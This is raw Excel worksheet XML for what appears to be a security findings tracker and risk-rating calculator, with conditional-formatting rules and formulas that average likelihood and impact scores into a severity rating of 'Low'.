            <xm:f>NOT(ISERROR(SEARCH($A$130,E27)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="49" operator="containsText" id="{A7E4B27F-392F-4316-83F8-0EA56FF9B846}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E27)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="50" operator="containsText" id="{8CBEC4A1-2AF1-40D1-9EEB-AC1C5DF5D103}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E27)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="51" operator="containsText" id="{E3FF6529-D53D-464E-83AF-60D2F80D3C33}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E27)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E27:E33</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="40" operator="containsText" id="{CF56A58F-047A-44B2-820B-49C0F52592C7}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E36)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="41" operator="containsText" id="{DE2746F3-42BB-4D12-A2FC-3B5F7C303DD0}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E36)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="42" operator="containsText" id="{9F5A3990-D021-4607-BF5B-D0B2467D035B}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E36)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="43" operator="containsText" id="{D1121675-7F83-4D07-8A4F-D676B14B49D9}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E36)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E36:E45</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="32" operator="containsText" id="{A4D8EE0B-F6CD-4F63-AB4E-C4CEEB224D11}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E48)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="33" operator="containsText" id="{92372C09-70EF-4D6D-8200-80A562603968}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E48)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="34" operator="containsText" id="{141A8224-8031-402E-AD1A-BADC24E19CF9}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E48)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="35" operator="containsText" id="{689A061A-2CFA-463D-9346-5F5245182C5D}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E48)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E48:E51</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="28" operator="containsText" id="{B2D2ED50-35B7-45A7-B97B-3A978BB9E390}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E54)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="29" operator="containsText" id="{7B2BFD90-6496-4848-8BD9-969614DA1583}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E54)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="30" operator="containsText" id="{708C5DA9-100D-422A-BA91-A609EF0F6076}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E54)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="31" operator="containsText" id="{2BF794BE-666B-4072-A141-AEEEE1F379A2}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E54)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E54:E61</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="24" operator="containsText" id="{D0340C68-1FCC-4430-80AF-5B43EE2B8C40}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E64)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="25" operator="containsText" id="{5CAD0BA7-037E-4F96-B943-1B788B571D91}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E64)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="26" operator="containsText" id="{F2058C3C-E005-4A50-92FD-3C17D3AD5A89}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E64)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="27" operator="containsText" id="{ACA34937-0F96-47BF-B9DB-B8436BA9823E}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E64)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E64:E90</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="17" operator="containsText" id="{F8F0291C-E8F9-441E-B497-7149F8FBB52B}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E93)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="18" operator="containsText" id="{85F3C2EB-25E8-4AAF-9B6D-EBA7D736C62B}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E93)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="19" operator="containsText" id="{502D5C69-9FEF-493C-80E4-DD6DDC6F3383}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E93)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="20" operator="containsText" id="{83132336-57F1-41FE-A682-5261FFA5818D}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E93)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E93:E94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="13" operator="containsText" id="{2C2E23D6-B21C-4CD8-A5BB-59AE30F08E4D}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E97)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="14" operator="containsText" id="{495720E9-60AE-42BA-9989-23C88D992E10}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E97)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="15" operator="containsText" id="{B8CD9EAB-7B8F-4C26-8DB7-84C4E334F784}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E97)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="16" operator="containsText" id="{895C36FB-D223-4A76-9E50-C1A211BF6BBB}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E97)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E97:E99</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="9" operator="containsText" id="{E22B4A38-D5A7-432B-9509-BF22C81C1EF3}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E102)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="10" operator="containsText" id="{44BA9894-F2DB-4D02-AF32-7E6C69904ACF}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E102)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="11" operator="containsText" id="{C64B6BCF-B3D3-43C9-992D-2DE06127ACA6}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E102)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="12" operator="containsText" id="{F4A8A962-1025-412C-81EF-13171406A670}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E102)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E102:E110</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="containsText" priority="1" operator="containsText" id="{50FCF4A3-E38C-492A-B5CD-D7D5972E6668}">
            <xm:f>NOT(ISERROR(SEARCH($A$130,E113)))</xm:f>
            <xm:f>$A$130</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="3" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="2" operator="containsText" id="{724458E4-9915-4FC9-95BF-418A479775FA}">
            <xm:f>NOT(ISERROR(SEARCH($A$129,E113)))</xm:f>
            <xm:f>$A$129</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor rgb="FFFF0000"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="3" operator="containsText" id="{B3D267D0-D2F6-4067-B2AF-39DACBF26CE0}">
            <xm:f>NOT(ISERROR(SEARCH($A$128,E113)))</xm:f>
            <xm:f>$A$128</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="-0.24994659260841701"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <x14:cfRule type="containsText" priority="4" operator="containsText" id="{45890E6E-E969-410D-897A-0410E6F70EE4}">
            <xm:f>NOT(ISERROR(SEARCH($A$127,E113)))</xm:f>
            <xm:f>$A$127</xm:f>
            <x14:dxf>
              <fill>
                <patternFill>
                  <bgColor theme="6" tint="0.79998168889431442"/>
                </patternFill>
              </fill>
            </x14:dxf>
          </x14:cfRule>
          <xm:sqref>E113:E124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J3" sqref="J3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="4.42578125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="19.7109375" customWidth="1"/>
    <col min="3" max="3" width="15.7109375" style="29" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="17.7109375" customWidth="1"/>
    <col min="5" max="5" width="8.7109375" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="10.28515625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="8.7109375" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="23.140625" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="16.85546875" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="9" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="30" x14ac:dyDescent="0.2">
      <c r="A1" s="33" t="s">
        <v>327</v>
      </c>
      <c r="B1" s="33" t="s">
        <v>328</v>
      </c>
      <c r="C1" s="33" t="s">
        <v>331</v>
      </c>
      <c r="D1" s="33" t="s">
        <v>330</v>
      </c>
      <c r="E1" s="33" t="s">
        <v>50</v>
      </c>
      <c r="F1" s="33" t="s">
        <v>51</v>
      </c>
      <c r="G1" s="33" t="s">
        <v>114</v>
      </c>
      <c r="H1" s="33" t="s">
        <v>333</v>
      </c>
      <c r="I1" s="33" t="s">
        <v>112</v>
      </c>
      <c r="J1" s="47" t="s">
        <v>334</v>
      </c>
    </row>
    <row r="2" spans="1:10" ht="25.5" x14ac:dyDescent="0.2">
      <c r="A2" s="30">
        <v>1</v>
      </c>
      <c r="B2" s="32" t="s">
        <v>329</v>
      </c>
      <c r="C2" s="32" t="s">
        <v>245</v>
      </c>
      <c r="D2" s="32" t="s">
        <v>332</v>
      </c>
      <c r="E2" s="31" t="s">
        <v>113</v>
      </c>
      <c r="F2" s="32" t="s">
        <v>115</v>
      </c>
      <c r="G2" s="35" t="s">
        <v>113</v>
      </c>
      <c r="H2" s="30"/>
      <c r="I2" s="30"/>
      <c r="J2" s="48" t="s">
        <v>335</v>
      </c>
    </row>
    <row r="3" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3" s="34"/>
      <c r="B3" s="34"/>
      <c r="C3" s="34"/>
      <c r="D3" s="34"/>
      <c r="E3" s="34"/>
      <c r="F3" s="34"/>
      <c r="G3" s="34"/>
      <c r="H3" s="34"/>
      <c r="I3" s="34"/>
    </row>
    <row r="4" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4" s="34"/>
      <c r="B4" s="34"/>
      <c r="C4" s="34"/>
      <c r="D4" s="34"/>
      <c r="E4" s="34"/>
      <c r="F4" s="34"/>
      <c r="G4" s="34"/>
      <c r="H4" s="34"/>
      <c r="I4" s="34"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="G2">
    <cfRule type="cellIs" dxfId="15" priority="6" operator="equal">
      <formula>"Low"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="14" priority="7" operator="equal">
      <formula>"Critical"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="13" priority="8" operator="equal">
      <formula>"Note"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="12" priority="9" operator="equal">
      <formula>"Moderate"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="11" priority="10" operator="equal">
      <formula>"High"</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6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B5" sqref="B5:D5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.85546875" defaultRowHeight="12.75" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="18.42578125" bestFit="1" customWidth="1"/>
    <col min="2" max="4" width="14.7109375" customWidth="1"/>
    <col min="5" max="5" width="5.42578125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="20.7109375" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="42.7109375" customWidth="1"/>
    <col min="8" max="8" width="3.7109375" customWidth="1"/>
    <col min="10" max="10" width="40.42578125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:10" ht="21" x14ac:dyDescent="0.35">
      <c r="A1" s="58" t="s">
        <v>8</v>
      </c>
      <c r="B1" s="58"/>
      <c r="C1" s="58"/>
      <c r="D1" s="58"/>
      <c r="E1" s="58"/>
      <c r="F1" s="58"/>
      <c r="G1" s="58"/>
    </row>
    <row r="3" spans="1:10" ht="15" x14ac:dyDescent="0.2">
      <c r="A3" s="59" t="s">
        <v>9</v>
      </c>
      <c r="B3" s="59"/>
      <c r="C3" s="59"/>
      <c r="D3" s="59"/>
      <c r="E3" s="2"/>
      <c r="F3" s="59" t="s">
        <v>10</v>
      </c>
      <c r="G3" s="59"/>
      <c r="I3" t="s">
        <v>11</v>
      </c>
      <c r="J3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="4" spans="1:10" ht="15" x14ac:dyDescent="0.2">
      <c r="A4" s="60" t="s">
        <v>13</v>
      </c>
      <c r="B4" s="60"/>
      <c r="C4" s="60"/>
      <c r="D4" s="60"/>
      <c r="E4" s="3"/>
      <c r="F4" s="60" t="s">
        <v>14</v>
      </c>
      <c r="G4" s="60"/>
    </row>
    <row r="5" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A5" s="4" t="s">
        <v>15</v>
      </c>
      <c r="B5" s="55" t="s">
        <v>459</v>
      </c>
      <c r="C5" s="56"/>
      <c r="D5" s="56"/>
      <c r="E5" s="5">
        <f>VLOOKUP(B5,References!A2:B8,2,FALSE)</f>
        <v>3</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>16</v>
      </c>
      <c r="G5" s="6" t="s">
        <v>74</v>
      </c>
      <c r="H5" s="7">
        <f>VLOOKUP(G5,References!A$11:B$16,2,FALSE)</f>
        <v>2</v>
      </c>
    </row>
    <row r="6" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A6" s="4" t="s">
        <v>18</v>
      </c>
      <c r="B6" s="63" t="s">
        <v>59</v>
      </c>
      <c r="C6" s="63"/>
      <c r="D6" s="63"/>
      <c r="E6" s="5">
        <f>VLOOKUP(B6,References!C2:D6,2,FALSE)</f>
        <v>4</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>20</v>
      </c>
      <c r="G6" s="6" t="s">
        <v>96</v>
      </c>
      <c r="H6" s="7">
        <f>VLOOKUP(G6,References!C$11:D$17,2,FALSE)</f>
        <v>9</v>
      </c>
    </row>
    <row r="7" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A7" s="4" t="s">
        <v>22</v>
      </c>
      <c r="B7" s="63" t="s">
        <v>55</v>
      </c>
      <c r="C7" s="63"/>
      <c r="D7" s="63"/>
      <c r="E7" s="5">
        <f>VLOOKUP(B7,References!E2:F6,2,FALSE)</f>
        <v>0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>24</v>
      </c>
      <c r="G7" s="6" t="s">
        <v>76</v>
      </c>
      <c r="H7" s="7">
        <f>VLOOKUP(G7,References!E$11:F$16,2,FALSE)</f>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A8" s="4" t="s">
        <v>26</v>
      </c>
      <c r="B8" s="63" t="s">
        <v>27</v>
      </c>
      <c r="C8" s="63"/>
      <c r="D8" s="63"/>
      <c r="E8" s="5">
        <f>VLOOKUP(B8,References!G3:H8,2,FALSE)</f>
        <v>2</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>28</v>
      </c>
      <c r="G8" s="6" t="s">
        <v>54</v>
      </c>
      <c r="H8" s="7">
        <f>VLOOKUP(G8,References!G$11:H$16,2,FALSE)</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A9" s="4"/>
      <c r="B9" s="8"/>
      <c r="C9" s="8"/>
      <c r="D9" s="8"/>
      <c r="E9" s="5"/>
      <c r="F9" s="4"/>
      <c r="G9" s="8"/>
      <c r="H9" s="7"/>
    </row>
    <row r="10" spans="1:10" ht="15" x14ac:dyDescent="0.2">
      <c r="A10" s="60" t="s">
        <v>30</v>
      </c>
      <c r="B10" s="60"/>
      <c r="C10" s="60"/>
      <c r="D10" s="60"/>
      <c r="E10" s="3"/>
      <c r="F10" s="60" t="s">
        <v>31</v>
      </c>
      <c r="G10" s="60"/>
      <c r="H10" s="3"/>
    </row>
    <row r="11" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A11" s="4" t="s">
        <v>32</v>
      </c>
      <c r="B11" s="54" t="s">
        <v>57</v>
      </c>
      <c r="C11" s="54"/>
      <c r="D11" s="54"/>
      <c r="E11" s="5">
        <f>VLOOKUP(B11,References!I2:J7,2,FALSE)</f>
        <v>1</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>34</v>
      </c>
      <c r="G11" s="6" t="s">
        <v>84</v>
      </c>
      <c r="H11" s="7">
        <f>VLOOKUP(G11,References!I$11:J$16,2,FALSE)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A12" s="4" t="s">
        <v>36</v>
      </c>
      <c r="B12" s="54" t="s">
        <v>67</v>
      </c>
      <c r="C12" s="54"/>
      <c r="D12" s="54"/>
      <c r="E12" s="5">
        <f>VLOOKUP(B12,References!K$2:L$7,2,FALSE)</f>
        <v>5</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>37</v>
      </c>
      <c r="G12" s="6" t="s">
        <v>85</v>
      </c>
      <c r="H12" s="7">
        <f>VLOOKUP(G12,References!K$11:L$16,2,FALSE)</f>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A13" s="4" t="s">
        <v>39</v>
      </c>
      <c r="B13" s="54" t="s">
        <v>61</v>
      </c>
      <c r="C13" s="54"/>
      <c r="D13" s="54"/>
      <c r="E13" s="5">
        <f>VLOOKUP(B13,References!M$2:N$7,2,FALSE)</f>
        <v>4</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>41</v>
      </c>
      <c r="G13" s="19" t="s">
        <v>86</v>
      </c>
      <c r="H13" s="7">
        <f>VLOOKUP(G13,References!M$11:O$16,2,FALSE)</f>
        <v>5</v>
      </c>
    </row>
    <row r="14" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="A14" s="4" t="s">
        <v>43</v>
      </c>
      <c r="B14" s="54" t="s">
        <v>62</v>
      </c>
      <c r="C14" s="54"/>
      <c r="D14" s="54"/>
      <c r="E14" s="5">
        <f>VLOOKUP(B14,References!O$2:P$7,2,FALSE)</f>
        <v>3</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>45</v>
      </c>
      <c r="G14" s="6" t="s">
        <v>81</v>
      </c>
      <c r="H14" s="7">
        <f>VLOOKUP(G14,References!O$11:P$16,2,FALSE)</f>
        <v>3</v>
      </c>
    </row>
    <row r="15" spans="1:10" ht="15" x14ac:dyDescent="0.25">
      <c r="E15" s="4"/>
    </row>
    <row r="16" spans="1:10" ht="15" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A16" s="61" t="s">
        <v>47</v>
      </c>
      <c r="B16" s="57">
        <f>IFERROR(AVERAGE(E5:E8,E11:E14),"All factors require a selection.")</f>
        <v>2.75</v>
      </c>
      <c r="C16" s="57"/>
      <c r="D16" s="57"/>
      <c r="E16" s="4"/>
      <c r="F16" s="62" t="s">
        <v>48</v>
      </c>
      <c r="G16" s="57">
        <f>IFERROR(AVERAGE(H5:H8,H11:H14),"All factors require a selection.")</f>
        <v>3.375</v>
      </c>
    </row>
    <row r="17" spans="1:7" ht="15" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A17" s="61"/>
      <c r="B17" s="57"/>
      <c r="C17" s="57"/>
      <c r="D17" s="57"/>
      <c r="F17" s="62"/>
      <c r="G17" s="57"/>
    </row>
    <row r="20" spans="1:7" ht="18.75" x14ac:dyDescent="0.3">
      <c r="B20" s="51" t="s">
        <v>49</v>
      </c>
      <c r="C20" s="51"/>
      <c r="D20" s="51"/>
      <c r="E20" s="52" t="str">
        <f>IFERROR(IF(AND($B$16&lt;3,$G$16&lt;3),"Note",IF(OR(AND($B$16&lt;3,$G$16&gt;=3,$G$16&lt;6),AND($B$16&gt;=3,$B$16&lt;6,$G$16&lt;3)),"Low",IF(OR(AND($B16&lt;3,$G16&gt;=6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;=3,$G16&lt;6),AND($B16&gt;=6,$G16&lt;3)),"MODERATE",IF(OR(AND($B16&gt;=6,$B16&gt;=3,$G16&lt;6),AND($B16&gt;=3,$B16&lt;6,$G16&gt;6)),"High","Critical")))),"Note")</f>
        <v>Low</v>
      </c>
      <c r="F20" s="52"/>
      <c r="G20" s="1"/>
    </row>
    <row r="22" spans="1:7" ht="15" x14ac:dyDescent="0.25">
      <c r="B22" s="53" t="s">
        <v>50</v>
      </c>
      <c r="C22" s="53"/>
      <c r="D22" s="53"/>
    </row>
    <row r="23" spans="1:7" ht="15" x14ac:dyDescent="0.25">
      <c r="A23" s="9" t="s">
        <v>51</v>
      </c>
      <c r="B23" s="1" t="str">
        <f>IF($G16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>Low</v>
      </c>
      <c r="C23" s="1" t="str">
        <f>IF(AND($G16&gt;=3,$G16&lt;6),"-&gt;Moderate&lt;-","Moderate")</f>
        <v>-&gt;Moderate&lt;-</v>
      </c>
      <c r="D23" s="1" t="str">
        <f>IF($G16&gt;=6,"-&gt;High&lt;-","High")</f>
        <v>High</v>
      </c>
      <c r="F23" s="10"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="11" t="str">
        <f>IF($B16&lt;3,"-&gt;Low&lt;-","Low")</f>
        <v>-&gt;Low&lt;-</v>
      </c>
      <c r="B24" s="12" t="str">
        <f>IF(AND($B$16&lt;3,$G$16&lt;3),"-&gt;Note&lt;-","Note")</f>
        <v>Note</v>
      </c>
